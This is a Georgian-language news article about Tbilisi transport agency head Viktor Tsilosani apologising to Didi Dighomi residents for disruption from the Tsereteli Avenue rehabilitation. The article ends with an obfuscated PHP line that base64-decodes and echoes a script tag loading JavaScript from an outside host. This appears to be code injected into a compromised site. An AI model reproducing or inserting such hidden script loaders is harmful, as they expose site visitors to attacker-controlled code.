celsiusi
ავერსი საქკაბელი

 თბილისის მერიის ტრანსპორტისა და ურბანული განვითარების სააგენტოს უფროსი ვიქტორ წილოსანი ამბობს, რომ წერეთლის რეაბილიტაციიდან გამომდინარე შექმნილი გადაადგილების დისკომფორტის გამო დიდი დიღმის მოსახლეობის რცხვენია და ბოდიშს უხდის. ამის შესახებ მან BMG tv-ის გადაცემა „წერტილში“ განაცხადა და დასძინა, რომ რეფორმები მტკივნეულია.

„მრცხვენია დიდი დიღმელების და მინდა მათ ბოდიში მოვუხადო, იმიტომ რომ წარმოუდგენელია წერეთლის გამზირის რეაბილიტაციის მიმდინარეობისას, დიდი დიღმიდან გამოსვლა ფიზიკურად წარმოუდგენელია, მაგრამ ეს რეფორმა მტკივნეულია. ეს არ არის ისეთი რეფორმა, რომელიც რაღაც კონკრეტულს ეხება, ეს ყველას ეხება, რადგან გადაადგილების პრობლემა ეხება ყველას, როგორც საზოგადოებრივი ტრანსპორტით, ასევე ავტომობილით, ქვეითად მოსიარულეს.

გაცილებით დიდი პრობლემა ქვეითად მოსიარულეებისთვის საჭირო ინფრასტრუქტურაა, მაგრამ ამაზე არავინ საუბრობს“, - ამბობს წილოსანი.

შეგახსენებთ, რომ წერეთლის გამზირის რეაბილიტაცია მიმდინარე წლის აპრილში დაიწყო, რის გამოც წერეთლის გამზირისა და შოთა შალიკაშვილის სახელობის ხიდზე საავტომობილო გადაადგილება შეიზღუდა. თბილისის მერიის მიერ არაერთხელ გავრცელებული ინფორმაციით, წერეთლის გამზირის რეაბილიტაცია 2024 წლის იანვარში დასრულდება.

წყარო:BMG

369
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");